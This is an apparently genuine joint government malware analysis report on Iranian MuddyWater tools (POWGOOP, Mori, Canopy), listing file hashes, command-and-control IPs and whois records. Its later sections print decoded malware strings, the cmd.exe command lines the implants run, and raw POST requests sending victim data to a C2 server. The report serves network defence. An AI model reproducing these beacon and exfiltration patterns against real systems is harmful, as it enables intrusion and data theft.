MAR–10369127–1.v1 – MuddyWater

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), the United Kingdom’s National Cyber Security Centre (NCSC-UK), and the National Security Agency (NSA) to provide detailed analysis of 23 files identified as MuddyWater tools. MuddyWater is a group of Iranian government-sponsored advanced persistent threat actors that conducts cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America.



FBI, CISA, CNMF, NCSC-UK, and NSA are distributing this MAR to enable network defense and reduce exposure to Iranian government malicious cyber activity. For more information on malicious Iranian government cyber activity, visit CISA's webpage at https://www.cisa.gov/uscert/iran.



Of the 23 malware samples analyzed, 14 files were identified as variants of the POWGOOP malware family. Two files were identified as JavaScript files that contain a PowerShell beacon. One file was identified as a Mori backdoor sample. Two malicious Microsoft Excel spreadsheets were identified as Canopy malware (also known as Starwhale) that contained macros and two encoded Windows script files, which maintain persistence and collect and exfiltrate the victim's system data to a command and control (C2).



The POWGOOP samples were discovered as Windows executables (not included this report) and contain three components:



1)    A dynamic-link library (DLL) file renamed as a legitimate filename to enable the DLL side-loading technique.

2)    An obfuscated PowerShell script, obfuscated as a .dat file used to decrypt a file named "config.txt."

3)    An encoded PowerShell script, obfuscated as a text file containing a beacon to a hardcoded Internet Protocol (IP) address.



These components retrieve encrypted commands from a C2 server. The command is decrypted on the victim machine and piped into a PowerShell command, sending the results of the command in the Cookie parameter of the return traffic, using the same encryption/Base64 encoding routine.

For a downloadable copy of IOCs, see: MAR-10369127-1.v1.stix.

Click here for a PDF version of this report.

Submitted Files (19)

026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141 (Cooperation terms.xls)

12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa (goopdate.dll)

2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82 (goopdate.dat)

255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a (TeresitaJordain_config.txt)

3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8 (FML.dll)

42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986 (rj.js)

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c (ZaibCb15Ak.xls)

5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f (Config2.txt)

7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4 (Dore.dat)

9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7 (Config.txt)

9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051 (libpcre2-8-0.dll)

9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2 (AntheHannah_config.txt)

b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c (note.js)

b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504 (Core.dat)

b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a (config.txt)

ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9 (config.txt)

dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92 (vcruntime140.dll)

e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13 (Core.dat)

e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca (HeidieLeone.txt)

Additional Files (4)

c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e (Outlook.wsf)

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0 (Outlook.wsf)

ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418 (Outlook.wsf)

f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0 (Outlook.wsf)

IPs (7)

185.117.75.34

185.118.164.21

185.183.96.44

185.183.96.7

192.210.191.188

5.199.133.149

88.119.170.124

12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

PE Sections

Packers/Compilers/Cryptors

Relationships

Description

This file was identified as a launcher and is contained within an executable "GoogleUpdate.exe" (not included in this submission). The DLL is renamed as a legitimate filename "goopdate.dll" to enable a DLL side-loading technique. Note: goopdate.dll is the name of a module belonging to Goopdate from Google Inc. The DLL side-loading technique is used to rename a malicious DLL to the name of a dependent file of a legitimate executable in order to execute its malicious code. For this variant, GoogleUpdate.exe depends on a legitimate file ‘goopdate.dll’. The malicious POWGOOP DLL is therefore renamed goopdate.dll to force GoogleUpdate.exe to execute the malicious code, which spawns a Rundll32.exe process to launch goopdate.dll with the DllRegisterServer function (Figure 1). This results in a PowerShell script, a "goopdate.dat" file (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82) decrypting a co-located "config.txt" file (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9), another obfuscated PowerShell script containing the C2 beacon.

Screenshots

2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file was identified as an obfuscated PowerShell script and is contained within an executable "GoogleUpdate.exe" (not included in this submission). This obfuscated PowerShell script is used to decode and run the additional obfuscated PowerShell script "config.txt" (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

Screenshots

ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file was identified as an encrypted PowerShell script and is contained within an executable "GoogleUpdate.exe" (not included in this submission). This PowerShell script is decoded by "goopdate.dat" (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82) and contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]183[.]96[.]7:443/index.php

--End C2 IP address--



The malware used the hardcoded C2 to pass remote commands to the victim machine. The encrypted commands are decrypted on the victim machine and piped into a PowerShell command, sending the results of the command in the Cookie parameter of the return traffic, using the same encryption/Base64 encoding routine.



The script uses 1-3 randomly generated human names as variables and function names (Figure 4). The script uses a modified Base64 routine adding or subtracting by 2, using two consecutive functions (Base64Dec, QueenieSusanneAvril) to decrypt remote commands to execute locally and two consecutive functions (Marlie, Kassandra) to encrypt the result and pass to the “Cookie:” parameter to be passed back to the C2 node.



The config.txt can be run separately as a .ps1 PowerShell script to execute the de-obfuscated code, which results in the victim machine pulling down any command the threat actor places in the index.php file located at 185[.]183[.]96[.]7:443 (ie. 'whoami') and executes locally on the victim machine. The script exfiltrates the result of the command in a Base64 encoded string passed through the 'Cookie: <Base64_encoded_string>' part of the packet (Figure 6).

Screenshots

185.183.96.7

Tags

command-and-control

URLs

• 185.183.96.7/index.php

Ports

• 443 TCP

Whois

Queried whois.ripe.net with "-B 185.183.96.7"...



% Information related to '185.183.96.0 - 185.183.96.255'



% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'



inetnum:        185.183.96.0 - 185.183.96.255

netname:        EU-HOSTSAILOR

descr:         HostSailor NL Services

country:        NL

admin-c:        AA31720-RIPE

tech-c:         AA31720-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-12-23T09:52:06Z

last-modified: 2016-12-23T09:52:06Z

source:         RIPE



person:         Ali Al-Attiyah

address:        Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +971 455 77 845

nic-hdl:        AA31720-RIPE

mnt-by:         MNT-HS

created:        2016-12-21T19:19:26Z

last-modified: 2019-03-18T14:07:12Z

source:         RIPE



% Information related to '185.183.96.0/24AS60117'



route:         185.183.96.0/24

descr:         EU-HOSTSAILOR 185.183.96.0/24

origin:         AS60117

mnt-by:         MNT-HS

created:        2016-12-23T09:50:04Z

last-modified: 2016-12-23T09:50:04Z

source:         RIPE

Relationships

Description

config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9) attempts to connect to this IP address.

9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

PE Sections

Packers/Compilers/Cryptors

Description

This file was identified as a launcher and is renamed as a legitimate filename "libpcre2-8-0.dll" to enable a DLL side-loading technique. Note: libpcre2-8-0.dll is a library for Mingw-w64, an open source software development environment. This file has similar capabilities as "goopdate.dll" (12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa).

dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

PE Sections

Packers/Compilers/Cryptors

Description

This file was identified as a launcher and is renamed as a legitimate filename "vcruntime140.dll" to enable a DLL side-loading technique. Note: vcruntime140.dll is a runtime library for Microsoft Visual Studio. This file has similar capabilities as "goopdate.dll" (12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa).

b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

PE Sections

Packers/Compilers/Cryptors

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]117[.]75[.]34

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

185.117.75.34

Tags

command-and-control

Ports

• 443 TCP

Whois

Queried whois.ripe.net with "-B 185.117.75.34"...



% Information related to '185.117.75.0 - 185.117.75.255'



% Abuse contact for '185.117.75.0 - 185.117.75.255' is 'abuse@hostsailor.com'



inetnum:        185.117.75.0 - 185.117.75.255

netname:        EU-HOSTSAILOR-20140124

descr:         HostSailor NL Services

country:        NL

admin-c:        AF11712-RIPE

tech-c:         AF11712-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-02-01T08:50:02Z

last-modified: 2016-02-01T08:50:02Z

source:         RIPE



person:         Host Sailor Ltd - Administrative role account

address:        Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +97145577845

nic-hdl:        AF11712-RIPE

mnt-by:         MNT-HS

created:        2014-06-30T16:22:26Z

last-modified: 2019-05-29T09:39:31Z

source:         RIPE

Relationships

Description

config.txt (b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a) and HeidieLeone.txt (e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca) attempt to connect to this IP address.

9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

192[.]210[.]191[.]188

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

192.210.191.188

Tags

command-and-control

Ports

• 443 TCP

Whois

Queried whois.arin.net with "n ! NET-192-210-191-0-1"...



NetRange:     192.210.191.0 - 192.210.191.255

CIDR:         192.210.191.0/24

NetName:        CC-192-210-191-0-24

NetHandle:     NET-192-210-191-0-1

Parent:         CC-11 (NET-192-210-128-0-1)

NetType:        Reallocated

OriginAS:     AS36352

Organization: Virtual Machine Solutions LLC (VMSL-100)

RegDate:        2019-03-26

Updated:        2019-03-26

Ref:            https://rdap.arin.net/registry/ip/192.210.191.0





OrgName:        Virtual Machine Solutions LLC

OrgId:         VMSL-100

Address:        12201 Tukwila International Blvd

City:         Seattle

StateProv:     WA

PostalCode:     98168

Country:        US

RegDate:        2016-06-22

Updated:        2020-12-10

Comment:        http://virmach.com/abuse to report abuse.

Ref:            https://rdap.arin.net/registry/entity/VMSL-100





OrgTechHandle: GOLES88-ARIN

OrgTechName: Golestani, Amir

OrgTechPhone: +1-800-877-2176

OrgTechEmail: report@virmach.com

OrgTechRef:    https://rdap.arin.net/registry/entity/GOLES88-ARIN



OrgAbuseHandle: GOLES88-ARIN

OrgAbuseName: Golestani, Amir

OrgAbusePhone: +1-800-877-2176

OrgAbuseEmail: report@virmach.com

OrgAbuseRef:    https://rdap.arin.net/registry/entity/GOLES88-ARIN

Relationships

Description

Config.txt (9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7) and Config2.txt (5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f) attempt to connect to this IP address.

5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

192[.]210[.]191[.]188

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an encrypted PowerShell script; it contains a beacon.



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]183[.]96[.]44

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

185.183.96.44

Tags

command-and-control

Ports

• 443 TCP

Whois

Queried whois.ripe.net with "-B 185.183.96.44"...



% Information related to '185.183.96.0 - 185.183.96.255'



% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'



inetnum:        185.183.96.0 - 185.183.96.255

netname:        EU-HOSTSAILOR

descr:         HostSailor NL Services

country:        NL

admin-c:        AA31720-RIPE

tech-c:         AA31720-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-12-23T09:52:06Z

last-modified: 2016-12-23T09:52:06Z

source:         RIPE



person:         Ali Al-Attiyah

address:        Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +971 455 77 845

nic-hdl:        AA31720-RIPE

mnt-by:         MNT-HS

created:        2016-12-21T19:19:26Z

last-modified: 2019-03-18T14:07:12Z

source:         RIPE



% Information related to '185.183.96.0/24AS60117'



route:         185.183.96.0/24

descr:         EU-HOSTSAILOR 185.183.96.0/24

origin:         AS60117

mnt-by:         MNT-HS

created:        2016-12-23T09:50:04Z

last-modified: 2016-12-23T09:50:04Z

source:         RIPE

Relationships

Description

TeresitaJordain_config.txt (255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a) attempts to connect to this IP address.

e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]117[.]75[.]34

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file is a JavaScript file that contains a PowerShell beacon for a GET request to:



--Begin GET request--

185[.]118[.]164[.]21:80/index?param=<computer_name>/<username>

--End GET request--



The JavaScript is launched using the native file “WScript.exe” where the file also creates persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task to relaunch the PowerShell script daily at 10:01. The manifestation function shows the parameters used to build the GET request to 185[.]118[.]164[.]21 and the scheduled task (Figure 7 and Figure 8).



As a persistence mechanism, the manifestation function also copies the file to the User’s Contacts folder, and sets a Scheduled Task to recur daily at 10:01 AM, which would relaunch the PowerShell beacon to 185[.]118[.]164[.]213 (Figure 9).

Screenshots

185.118.164.21

Tags

command-and-control

URLs

• 185.118.164.21/index?param=<computer_name>/<username>

Ports

• 80 TCP

Whois

Queried whois.ripe.net with "-B 185.118.164.21"...



% Information related to '185.118.164.0 - 185.118.165.255'



% Abuse contact for '185.118.164.0 - 185.118.165.255' is 'abuse@profitserver.ru'



inetnum:        185.118.164.0 - 185.118.165.255

netname:        RU-CHELYABINSK-SIGNAL-20150923

country:        RU

admin-c:        AN29881-RIPE

tech-c:         AN29881-RIPE

status:         ASSIGNED PA

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2016-10-12T10:22:21Z

last-modified: 2016-10-12T10:22:21Z

source:         RIPE



person:         Alexey Nevolin

address:        Ordzhonikidze str., 54-B

address:        454091

address:        Chelyabinsk

address:        RUSSIAN FEDERATION

phone:         +7 3517299971

nic-hdl:        AN29881-RIPE

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2015-09-18T15:23:57Z

last-modified: 2015-09-18T15:23:58Z

source:         RIPE



% Information related to '185.118.164.0/24AS44493'



route:         185.118.164.0/24

descr:         Chelyabinsk-Signal

origin:         AS44493

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2015-11-17T05:53:42Z

last-modified: 2015-11-17T05:53:42Z

source:         RIPE

Relationships

Description

note.js (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and rj.js (42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986) connected to this IP address.

42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986

Tags

backdoor

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file is a heavily obfuscated JavaScript with encoded values which contains a PowerShell beacon for a GET request to:



--Begin GET request--

185[.]118[.]164[.]21:80/index?param=<computer_name>/<username>

--End GET Request--



This file performs the same tasks as "note.js" (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and is launched using the native file “WScript.exe” where the rj.js gains persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task to relaunch the PowerShell script daily at 10:01 AM.

3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8

Tags

backdoor

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

PE Sections

Description

This file has been identified as a Mori Backdoor. The file is a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer and appears to be a component to another program. FML.dll contains approximately 200MB of junk in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex: 0x50504060 and performs the following tasks:



- Deleting the file FILENAME.old and deleting file by registry value. The filename is the DLL file with a .old extension (Figure 13).

- The sample resolves networking APIs from strings that are ADD-encrypted with the key 0x05.

- The sample uses Base64 and JSON based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.

- For C2 communication, the sample uses HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag.

- Reading and/or writing data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default)

(See Figure 14).

Screenshots

026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141

Tags

downloaderdropperloadertrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a malicious Excel file that contains macros written in Visual Basic for Applications (VBA) and two encoded wsf files. When the Excel file is opened, the victim will be prompted to enable macros with the “Enable Content” button. The macros are executed once the victim enables content. When executed, the macros decode and install the embedded wsf files into the directories below:



--Begin files--

"%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"

"C:\ProgramData\Outlook.wsf "

--End files--

Screenshots

c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e

Tags

downloaderloadertrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a wsf file installed by Cooperation terms.xls (026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141). This file is installed into the current user startup folder to run automatically at startup. The file contains hexadecimal (hex)-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

"okppQO4Hbr0n3PBQt78IQhFQlIvXjWRu.run PprJwVD1jVboW9s2WjL9uCH1Jk02tisB,0,TRUE"

"cmd.exe /c cscript.exe %ProgramData%\\Outlook.wsf jaguar_plus"

--End strings--



It executes the command below to run the wsf file "%ProgramData%\Outlook.wsf" (f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0) with the argument "jaguar_plus".



Displayed below is the command:



--Begin command--

"cmd.exe /c cscript.exe %ProgramData%\\Outlook.wsf jaguar_plus"

--End command--

Screenshots

f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0

Tags

downloaderloadertrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a wsf file installed by Cooperation terms.xls (026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141) and executed by Outlook.wsf (c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e). The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decodes these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

{impersonationLevel=impersonate}!\\\\

%AppData%\\Local\\Temp\\h.txt

ezedcjrfvjriftmldedu

lcekcnkxkbllmwlpoklgof

http[:]//88[.]119[.]170[.]124/

POST

E442779124B3E37D2A3F77D77B66A.Open H9C223C34C88AD14FAD121E5E9C968,FFCC6585A837E41D4D73CB795EA25,False"

E442779124B3E37D2A3F77D77B66A.send H9C223C34C88AD14FAD121E5E9C968"

cmd.exe /c

>> %temp%\\h.txt

Select * from Win32_IP4RouteTable

"%COMPUTERNAME%"

"%USERNAME%"

--End strings--



It collects the victim's system IP address, computer name, and username in the format below:



--Begin information--

Format: [victim's system Internet Protocol address]|#@*@#|[Computer name]/Username

Sample: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01"

--End information--



The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the Uniform Resource Identifier (URI): "http[:]//88[.]119[.]170[.]124/ezedcjrfvjriftmldedu" and wait for a response.



Displayed below is the POST request used to exfiltrate the victim's system data:



--Begin request--

POST /ezedcjrfvjriftmldedu HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 88[.]119[.]170[.]124



vl=1693273632E6349334E37235340D743442D53463ED34C7CC2214A90423C5494228E4F7032293856253E6216713

--End request---



The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex encoded and reshuffled. It uses the same built-in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|#@*@#|" or "/!*##*!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:



--Begin command--

"cmd.exe /c [decoded command scripts]| >> %temp%\\h.txt"

--End command--



The output of the command-line scripts executed is stored into a text file "%temp%\h.txt". It reads the output of the command executed from the text file "%temp%\h.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:



--Begin format--

Format: "[victim's system Internet Protocol address]|#@*@#|[Computer name]/Username|#@*@#|[Output of the command executed]"



Sample observed: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"

--End format--



The above victim's system's information and the output command data are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof" and wait for a response (next command).



Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:



--Begin request--

POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 9813

Host: 88[.]119[.]170[.]124



vl=[re-ordered hex-encoded victim's system data and the output of the command executed]

--End request---



Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:



--Begin request--

POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 5689

Host: 88[.]119[.]170[.]124



vl=A093273633E2339332927232320A723242D6E6D346365E7226F466E77467273E265674D6469267477C024204601063744215623203A2E202224279426216621227E262052222240296E426262......F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C63066A2027EC2122220524492D8F230420F2397E6CEC225648F56E59600C63706AE0604C4410625E607022202856253E521D013

--End request---



It is designed to send these messages below to the C2 server using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":



--Begin message format--

"200/!*##*!/19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|#@*@#|" or "/!*##*!/".

"19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|sory" ==> When a command or a specific task fails

--End message format--

Screenshots

88.119.170.124

Tags

command-and-control

HTTP Sessions

• POST /ezedcjrfvjriftmldedu HTTP/1.1
  
